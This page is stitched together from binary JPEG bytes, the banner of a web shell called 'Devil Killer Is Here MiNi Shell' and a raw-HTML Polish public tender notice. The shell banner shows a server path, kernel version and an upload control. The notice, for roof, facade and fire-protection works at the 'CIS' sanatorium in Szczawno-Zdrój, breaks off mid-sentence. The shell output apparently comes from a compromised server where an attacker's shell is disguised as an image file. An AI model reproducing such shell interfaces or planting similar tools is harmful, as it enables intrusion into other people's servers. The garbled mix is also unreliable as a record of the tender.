JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20231219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20231219/0056081501-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont dachu, elewacji oraz wykonanie zabezpieczeń przeciwpożarowych w obiekcie sanatoryjnym „CIS” w Szczawnie-Zdroju przy ul. Sienkiewicza 5. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Uzdrowisko Szczawno-Jedlina S.A.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000288308</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wojska Polskiego 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szczawno-Zdrój</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-310</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL517 - Wałbrzyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mfajek@szczawno-jedlina.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.szczawno-jedlina.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont dachu, elewacji oraz wykonanie zabezpieczeń przeciwpożarowych w obiekcie sanatoryjnym „CIS” w Szczawnie-Zdroju przy ul. Sienkiewicza 5. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-cc77075f-9e57-11ee-948d-82b0c04ef850</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00560815</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-12-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://szczawno-jedlina.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://szczawno-jedlina.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się za pomocą środka komunikacji elektronicznej, tj.<br/>platformy do elektronicznej obsługi zamówień publicznych Zamawiającego dostępnej pod adresem: https://szczawnojedlina.<br/>logintrade.net<br/>/rejestracja/ustawowe.html. Korzystanie z Platformy przez Wykonawcę jest bezpłatne.<br/>Wykonawca zobowiązany jest składać wszystkie dokumenty (oferty oraz oświadczenia) pod rygorem nieważności opatrzone<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>Środkiem komunikacji elektronicznej, służącym złożeniu oferty przez Wykonawcę, jest Platforma zakupowa i konto Zamawiającego<br/>dostępne pod adresem https://szczawno-jedlina.logintrade.net<br/>/rejestracja/ustawowe.html w wierszu oznaczonym tytułem oraz znakiem sprawy zgodnym z niniejszym postępowaniem.<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na Platformie<br/>zakupowej https://szczawno-jedlina.logintrade.net/rejestracja<br/>/ustawowe.html. Wykonawca posiadający konto na Platformie zakupowej ma dostęp do możliwości złożenia, zmiany, wycofania<br/>oferty, a także funkcjonalności pozwalających na zadawanie pytań do treści SWZ oraz komunikację z Zamawiającym w pozostałych<br/>obszarach.<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu, opisane<br/>zostały w Instrukcji korzystania z Platformy na: https://szczawno-jedlina.logintrade.net/rejestracja/instrukcje.html.<br/>Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być<br/>zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 17 października 2018 r. w sprawie użycia<br/>środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego oraz udostępniania i przechowywania<br/>dokumentów elektronicznych oraz rozporządzeniu Ministra Rozwoju z dnia 26 lipca 2016 r. w sprawie rodzajów dokumentów, jakich<br/>może żądać zamawiający od Wykonawcy w postępowaniu o udzielenie zamówienia.<br/>Regulamin korzystania z Platformy zakupowej znajduje się pod adresem:<br/>https://szczawnojedlina.logintrade.net/rejestracja/regulamin.html</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">INFORMACJA O PRZETWARZANIU DANYCH OSOBOWYCH<br/>Osób biorących udział w postępowaniu o udzielenie zamówienia publicznego<br/>w Uzdrowisku Szczawno-Jedlina S.A.<br/>1. Administratorem Pani/Pana danych osobowych jest Uzdrowisko Szczawno-Jedlina S.A. z/s ul. Wojska Polskiego 6, 58-310<br/>Szczawno-Zdrój.<br/>2. Dane osobowe przetwarzane są zgodnie z art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem<br/>o udzielenie niniejszego zamówienia publicznego<br/>3. Dane pozyskiwane są bezpośrednio od Pani/Pana wyłącznie w zakresie koniecznym przeprowadzenia postępowania.<br/>4. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Prawo Zamówień Publicznych, związanym z udziałem w postępowaniu o udzielenie zamówienia<br/>publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Prawo Zamówień Publicznych.<br/>5. Przysługuje Pani/Panu prawo dostępu do treści danych oraz żądania ich sprostowania, usunięcia lub ograniczenia przetwarzania,<br/>jak również prawo do cofnięcia zgody w dowolnym momencie oraz prawo do wniesienia skargi do organu nadzorczego, tj. Prezesa<br/>Urzędu Ochrony Danych Osobowych.<br/>6. Udostępnione przez Panią/Pana dane nie będą udostępniane podmiotom trzecim. Odbiorcami Pani/Pana danych osobowych<br/>będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o przepisy ustawy Prawo Zamówień<br/>Publicznych.<br/>7. Pani/Pana dane nie będą podlegały profilowaniu.<br/>8. Pani/Pana dane osobowe nie będą przekazywane do państwa trzeciego lub organizacji międzynarodowej.<br/>9. Pani/Pana dane osobowe będą przechowywane przez okres, w jakim będzie odbywało się postępowanie oraz przez okres<br/>wymagany przepisami prawa, zgodnie z ustawą PRAWO ZAMÓWIEŃ PUBLICZNYCH, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy.<br/>10. Do przetwarzania danych osobowych dopuszczone są osoby pracujące na stanowiskach, dla których dostęp do danych został<br/>zdefiniowany jako uzasadniony i wynika ściśle z zakresu obowiązków pracownika.<br/>11. Inspektorem Ochrony Danych Osobowych w Uzdrowisku Szczawno-Jedlina jest Pani Magdalena Motyl, tel. 74/849-31-50, email:<br/>sekretariat@szczawno-jedlina.pl</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">INFORMACJA O PRZETWARZANIU DANYCH OSOBOWYCH<br/>Osób biorących udział w postępowaniu o udzielenie zamówienia publicznego<br/>w Uzdrowisku Szczawno-Jedlina S.A.<br/>1. Administratorem Pani/Pana danych osobowych jest Uzdrowisko Szczawno-Jedlina S.A. z/s ul. Wojska Polskiego 6, 58-310<br/>Szczawno-Zdrój.<br/>2. Dane osobowe przetwarzane są zgodnie z art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem<br/>o udzielenie niniejszego zamówienia publicznego<br/>3. Dane pozyskiwane są bezpośrednio od Pani/Pana wyłącznie w zakresie koniecznym przeprowadzenia postępowania.<br/>4. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Prawo Zamówień Publicznych, związanym z udziałem w postępowaniu o udzielenie zamówienia<br/>publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Prawo Zamówień Publicznych.<br/>5. Przysługuje Pani/Panu prawo dostępu do treści danych oraz żądania ich sprostowania, usunięcia lub ograniczenia przetwarzania,<br/>jak również prawo do cofnięcia zgody w dowolnym momencie oraz prawo do wniesienia skargi do organu nadzorczego, tj. Prezesa<br/>Urzędu Ochrony Danych Osobowych.<br/>6. Udostępnione przez Panią/Pana dane nie będą udostępniane podmiotom trzecim. Odbiorcami Pani/Pana danych osobowych<br/>będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o przepisy ustawy Prawo Zamówień<br/>Publicznych.<br/>7. Pani/Pana dane nie będą podlegały profilowaniu.<br/>8. Pani/Pana dane osobowe nie będą przekazywane do państwa trzeciego lub organizacji międzynarodowej.<br/>9. Pani/Pana dane osobowe będą przechowywane przez okres, w jakim będzie odbywało się postępowanie oraz przez okres<br/>wymagany przepisami prawa, zgodnie z ustawą PRAWO ZAMÓWIEŃ PUBLICZNYCH, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy.<br/>10. Do przetwarzania danych osobowych dopuszczone są osoby pracujące na stanowiskach, dla których dostęp do danych został<br/>zdefiniowany jako uzasadniony i wynika ściśle z zakresu obowiązków pracownika.<br/>11. Inspektorem Ochrony Danych Osobowych w Uzdrowisku Szczawno-Jedlina jest Pani Magdalena Motyl, tel. 74/849-31-50, email:<br/>sekretariat@szczawno-jedlina.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP 38/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiot zamówienia: Remont dachu, elewacji oraz wykonanie zabezpieczeń przeciwpożarowych w obiekcie<br/>sanatoryjnym „CIS” w Szczawnie Zdroju przy ul. Sienkiewicza 5.<br/>2. Przedmiot zamówienia obejmuje :<br/>1) Remont dachu<br/>2) Wymianę wszystkich obróbek blacharskich<br/>3) Wymianę instalacji odgromowej wraz z pomiarami powykonawczymi<br/>4) Wymianę stolarki okiennej i drzwiowej<br/>5) Wykonanie hydroizolacji ścian piwnic i drenażu opaskowego<br/>6) Wykonanie zabezpieczeń przeciwpożarowych.<br/>3. Szczegółowy opis przedmiotu zamówienia wraz z dokumentacją projektową zawiera załącznik nr 2 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">XX.	Opis kryteriów oceny ofert wraz z podaniem wag tych kryteriów i sposobu oceny ofert <br/><br/>Nr	Nazwa kryterium	Waga %	Sposób punktowania - minimalizacja<br/>1 Cena brutto	90%	Liczba punktów (C) = (cena najniższa zaproponowana w ofertach/cena badanej oferty) x 90<br/>2	Skrócony czas realizacji prac dla robót ppoż	10%	Wykonanie robót ppoż w terminie 5 miesięcy – 0 pkt jako spełnienie warunku minimum<br/>Wykonanie robót ppoż w terminie skróconym o 4 tygodnie – 10 pkt.<br/><br/>1.	Oferty będą oceniane następująco:<br/>	Kryterium 1 – najtańsza cenowo oferta uzyska 90 pkt, pozostałe proporcjonalnie mniej.<br/>	Kryterium 2 – zgodnie z punktacją.<br/>1)	Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Oferty.<br/>2)	Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>2.	Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>3.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>4.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócony czas realizacji prac dla robót ppoż</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym: Zamawiający nie wymaga przedstawienia osobnych dowodów na<br/>potwierdzenie tego warunku<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie wymaga przedstawienia osobnych dowodów<br/>na potwierdzenie tego warunku<br/>3) sytuacji ekonomicznej lub finansowej: Zamawiający nie wymaga przedstawienia osobnych dowodów na potwierdzenie<br/>tego warunku<br/>4) zdolności technicznej lub zawodowej:<br/>a) Zamawiający wymaga wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz<br/>podmiotów, na rzecz których roboty te zostały wykonane oraz załączeniem dowodów określających, czy te roboty<br/>budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty;<br/>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże (zał. Nr 7) w powyższym zakresie i przy spełnieniu<br/>powyższych warunków wykonanie min. 1 roboty a max. 2 robót podobnego rodzaju, tj. wykonanych na obiektach wpisanych<br/>do rejestru zabytków, i zawierających takie elementy jak remont/wykonanie elewacji, dachu instalacji przeciwpożarowej, o<br/>wartości sumarycznej nie niższej niż 1 000 000 zł brutto.<br/>b) Zamawiający wymaga wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania<br/>zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami.<br/>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże (zał. nr 8 do SWZ) min:<br/> Kierownika budowy: ważne uprawnienia do kierowania robotami w branży konstrukcyjno- budowlanej lub równoważnej bez<br/>ograniczeń. Kierownik budowy musi posiadać co najmniej 2-letnią praktykę zawodową oraz doświadczenie na budowie przy<br/>obiektach wpisanych do rejestru zabytków - należy wykazać min. 2 roboty na obiektach wpisanych do rejestru zabytków.<br/> Osobę uprawnioną do kierowania pracami konserwatorskimi, pracami restauratorskimi lub badaniami konserwatorskimi,<br/>prowadzonymi przy zabytkach wpisanych do rejestru zgodnie z art. 37a ust 1 i 2 obowiązującej Ustawy o ochronie zabytków<br/>i opiece nad zabytkami.<br/>Uwaga: Zamawiający uzna także za spełnienie powyższego warunku sytuację, gdzie jedna osoba spełnia oba powyższe<br/>wymogi.<br/>Zamawiający dopuszcza możliwość potwierdzenia spełniania warunku dot. dysponowania odpowiednimi osobami również<br/>poprzez wykazanie posiadania wymaganych uprawnień wydanych na podstawie wcześniej obowiązujących niż obecnie<br/>przepisów oraz odpowiadające im uprawnienia wydane Obywatelom państw członkowskich Unii Europejskiej, Konfederacji<br/>Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) - stron umowy o<br/>Europejskim Obszarze Gospodarczym oraz innych przepisów ustawy Prawo Budowlane oraz ustawy o zasadach uznawania<br/>kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">obowiązuje oświadczenie<br/>składane na podstawie art. 125 ust. 1 ustawy z dnia 11 września 2019r. Prawo zamówień publicznych zawierające oświadczenie dot.<br/>art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na<br/>Ukrainę oraz służących ochronie bezpieczeństwa narodowego</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/>c) Zamawiający wymaga wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz<br/>podmiotów, na rzecz których roboty te zostały wykonane oraz załączeniem dowodów określających, czy te roboty budowlane zostały<br/>wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na<br/>rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać<br/>tych dokumentów – inne odpowiednie dokumenty;<br/>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże (zał. Nr 7) w powyższym zakresie i przy spełnieniu powyższych<br/>warunków wykonanie min. 1 roboty a max. 2 robót podobnego rodzaju, tj. wykonanych na obiektach wpisanych do rejestru zabytków,<br/>i zawierających takie elementy jak remont/wykonanie elewacji, dachu instalacji przeciwpożarowej, o wartości sumarycznej nie niższej<br/>niż 1 000 000 zł brutto.<br/>d) Zamawiający wymaga wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności<br/>odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich<br/>kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także<br/>zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/>Zamawiający uzna warunek za spełniony, jeśli 